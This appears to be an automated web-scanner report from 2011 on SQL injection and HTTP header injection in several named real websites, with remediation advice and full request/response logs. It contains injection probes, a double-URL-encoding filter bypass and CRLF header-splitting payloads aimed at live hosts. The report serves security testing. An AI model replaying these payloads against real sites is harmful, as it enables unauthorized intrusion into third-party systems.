SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET / HTTP/1.1 Host: www.kiteship.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:48:58 GMT Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5 Connection: close Content-Type: text/html Content-Length: 14060
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio ...[SNIP]... <font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2011-01-19'' at line 1</font> ...[SNIP]...
Request 2
GET / HTTP/1.1 Host: www.kiteship.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:48:59 GMT Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5 Connection: close Content-Type: text/html Content-Length: 13478
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio ...[SNIP]...
1.2. http://www.kiteship.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kiteship.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /?1'=1 HTTP/1.1 Host: www.kiteship.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:48:49 GMT Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5 Connection: close Content-Type: text/html Content-Length: 14074
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio ...[SNIP]... <font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND date = '2011-01-19'' at line 1</font> ...[SNIP]...
Request 2
GET /?1''=1 HTTP/1.1 Host: www.kiteship.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:48:49 GMT Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5 Connection: close Content-Type: text/html Content-Length: 13478
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww ...[SNIP]... .call(arguments)));}},/** * @param args[] */warn: function() {if(this._is_enabled) {console.warn.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param args[] */error: function() {if(this._is_enabled) {console.error.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param Object object */dir: function(object) {if(this._is_enabl ...[SNIP]... oad correctly');TConsole.log('Possible reasons include (but are not limited to):');TConsole.log('- Missing load.trace() call at end of file');TConsole.log('- Syntax error in file');TConsole.log('- PHP exception/error thrown on page load. Check source of html response.');TConsole.log('Number of missing files:', loader.pending_list_length);TConsole.log('Missing files:');for (var i in loader.pending_list) {if ( ...[SNIP]...
Request 2
GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=''
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /share HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close
Response 1 (redirected)
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 2005 04:59:59 GMT Content-Type: text/html Connection: close Date: Thu, 20 Jan 2011 00:51:34 GMT Content-Length: 39370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww ...[SNIP]... .call(arguments)));}},/** * @param args[] */warn: function() {if(this._is_enabled) {console.warn.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param args[] */error: function() {if(this._is_enabled) {console.error.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param Object object */dir: function(object) {if(this._is_enabl ...[SNIP]... oad correctly');TConsole.log('Possible reasons include (but are not limited to):');TConsole.log('- Missing load.trace() call at end of file');TConsole.log('- Syntax error in file');TConsole.log('- PHP exception/error thrown on page load. Check source of html response.');TConsole.log('Number of missing files:', loader.pending_list_length);TConsole.log('Missing files:');for (var i in loader.pending_list) {if ( ...[SNIP]...
Request 2
GET /share HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close
Response 2
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 2005 04:59:59 GMT Content-Type: text/html Connection: close Date: Thu, 20 Jan 2011 00:51:35 GMT Content-Length: 39369
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww ...[SNIP]... .call(arguments)));}},/** * @param args[] */warn: function() {if(this._is_enabled) {console.warn.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param args[] */error: function() {if(this._is_enabled) {console.error.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param Object object */dir: function(object) {if(this._is_enabl ...[SNIP]... oad correctly');TConsole.log('Possible reasons include (but are not limited to):');TConsole.log('- Missing load.trace() call at end of file');TConsole.log('- Syntax error in file');TConsole.log('- PHP exception/error thrown on page load. Check source of html response.');TConsole.log('Number of missing files:', loader.pending_list_length);TConsole.log('Missing files:');for (var i in loader.pending_list) {if ( ...[SNIP]...
Request 2
GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the cr request parameter is copied into the Location response header. The payload 78564%0d%0a92caa119d03 was submitted in the cr parameter. This caused a response containing an injected HTTP header.
Request
GET /ad/l/1?s=a116&t=12954824355285936&adid=170504&reid=79402&arid=0&auid=&cn=defaultImpression&et=i&_cc=170504,79402,11811.,11074.11081.11744.11811.,1295482435,1&tpos=0&iw=&uxnw=&uxss=&uxct=&init=1&cr=78564%0d%0a92caa119d03 HTTP/1.1 Host: 2822.v.fwmrm.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _cph="1295039779.438.1.1,"; _sid="a116_5564054660803241609"; _sc="sg23001.1295482428.1295482477.28800.0.21,"; _auv="g23001~1.1295482477.0,13310.1295482477.0,^"; _uid="a104_5562153497824379009"; NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f3545525d5f4f58455e445a4a423209; _wr="g23001"; _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,";
Response
HTTP/1.1 302 Found Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:32:16 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _auv="g23001~1.1295483536.0,13310.1295483536.0,^";expires=Sat, 19 Feb 2011 00:32:16 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _vr="1295483280..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:32:16 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _sc="sg23001.1295482428.1295483536.28800.0.21,";expires=Sat, 19 Feb 2011 00:32:16 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _wr="g23001";expires=Sat, 19 Feb 2011 00:32:16 GMT;domain=.fwmrm.net;path=/; Location: 78564 92caa119d03 Content-Length: 0 Date: Thu, 20 Jan 2011 00:32:16 GMT Server: FWS P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID" Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3945525d5f4f58455e445a4a423209;path=/;httponly
The value of the c request parameter is copied into the Location response header. The payload d31e9%0d%0a0f93aeeb63f was submitted in the c parameter. This caused a response containing an injected HTTP header.
Request
GET /ad?c=EPLFVb4gYEitVIXNBCKa0xQ7E-q0hdHagyKSV9rbMGn0fJ9zsbGZN4CyKa6mnyBGPxQkyumws5Xt6rwuZek5LVXWIZUsD+x8G9fs11dXeU4=!http://a.collective-media.net/jump/cm.martini/;sz=728x90;ord=3271752524?\d31e9%0d%0a0f93aeeb63f HTTP/1.1 Host: ad.afy11.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: f=AgECAAAAAAALqJELwX83TQyokQsDfjdN; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; a=AZ7s9B85IkyRNDgbVDU-vg;
Response
HTTP/1.0 302 Moved Temporarily Connection: close Server: AdifyServer Location: http://a.collective-media.net/jump/cm.martini/;sz=728x90;ord=3271752524?\d31e9 0f93aeeb63f P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
The value of REST URL parameter 1 is copied into the Location response header. The payload 11f84%0d%0af74fcbd7a68 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /11f84%0d%0af74fcbd7a68/N5371.150779.COLLECTIVEMEDIA/B5050596.3 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/11f84 f74fcbd7a68/N5371.150779.COLLECTIVEMEDIA/B5050596.3: Date: Thu, 20 Jan 2011 00:35:35 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 86c2c%0d%0a7595e25e347 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /86c2c%0d%0a7595e25e347/cm.martini/;net=cm;u=,cm-82053649_1295482372,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l;;cmw=owl;sz=728x90;net=cm;ord1=707118;contx=sports;an=40;dc=w;btg=cm.cm_aa_gn1;btg=cm.weath_l;ord=3271752524? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/86c2c 7595e25e347/cm.martini/%3Bnet%3Dcm%3Bu%3D%2Ccm-82053649_1295482372%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D707118%3Bcontx%3Dsports%3Ban%3D40%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bord%3D3271752524: Date: Thu, 20 Jan 2011 00:28:50 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 5c65d%0d%0ab34a39a2892 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5c65d%0d%0ab34a39a2892;h=v8/3a95/0/0/%2a/v;233352718;0-0;3;49633220;2321-160/600;39898763/39916550/1;u=,cm-23797598_1295482817,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l-cm.sports_l;~okv=;net=cm;u=,cm-23797598_1295482817,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l-cm.sports_l;;cmw=owl;sz=160x600;net=cm;ord1=881330;contx=sports;an=40;dc=w;btg=cm.cm_aa_gn1;btg=cm.weath_l;btg=cm.sports_l;~aopt=3/0/ef/0;~sscs=%3fhttp://www.coloradoski.com/Resorts/Southwest/?utm_source=collective160x60&utm_medium=banner&utm_content=pricepoint&utm_campaign=southwest HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5c65d b34a39a2892;h=v8/3a95/0/0/*/v;233352718;0-0;3;49633220;2321-160/600;39898763/39916550/1%3Bu%3D%2Ccm-23797598_1295482817%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l-cm.sports_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-23797598_1295482817%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l-cm.sports_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bn: Date: Thu, 20 Jan 2011 00:35:33 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 33d4f%0d%0a851ee4bbe60 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /33d4f%0d%0a851ee4bbe60/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/33d4f 851ee4bbe60/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 279 Date: Thu, 20 Jan 2011 00:39:05 GMT X-Varnish: 344233096 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/33d4f 851ee4bbe60/">here</a ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload abf8c%0d%0a91e5c00ccbd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /abf8c%0d%0a91e5c00ccbd/api/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/abf8c 91e5c00ccbd/api/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:39:08 GMT X-Varnish: 2146052139 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/abf8c 91e5c00ccbd/api/">her ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 85f95%0d%0a5539f270833 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /about/85f95%0d%0a5539f270833/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/about/85f95 5539f270833/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 285 Date: Thu, 20 Jan 2011 00:39:09 GMT X-Varnish: 1498223378 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/about/85f95 5539f270833/">h ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 43dfc%0d%0ad402f0a3916 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /43dfc%0d%0ad402f0a3916/list/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/43dfc d402f0a3916/list/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 299 Date: Thu, 20 Jan 2011 00:39:07 GMT X-Varnish: 1274888219 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/43dfc d402f0a3916/list/">he ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload ef468%0d%0a5fd4684d734 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /blogs/ef468%0d%0a5fd4684d734/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/blogs/ef468 5fd4684d734/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 285 Date: Thu, 20 Jan 2011 00:39:07 GMT X-Varnish: 2146051924 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/blogs/ef468 5fd4684d734/">h ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 88e08%0d%0a14a8636d647 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /88e08%0d%0a14a8636d647/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/88e08 14a8636d647/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 279 Date: Thu, 20 Jan 2011 00:39:09 GMT X-Varnish: 1498223396 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/88e08 14a8636d647/">here</a ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 7a449%0d%0a7d68a3963a7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7a449%0d%0a7d68a3963a7/?attached_to=post4658178&skin=rss HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/7a449 7d68a3963a7/?attached_to=post4658178&skin=rss Content-Type: text/html; charset=iso-8859-1 Content-Length: 316 Date: Thu, 20 Jan 2011 00:39:05 GMT X-Varnish: 1498222875 Age: 0 Via: 1.1 varnish Connection: close
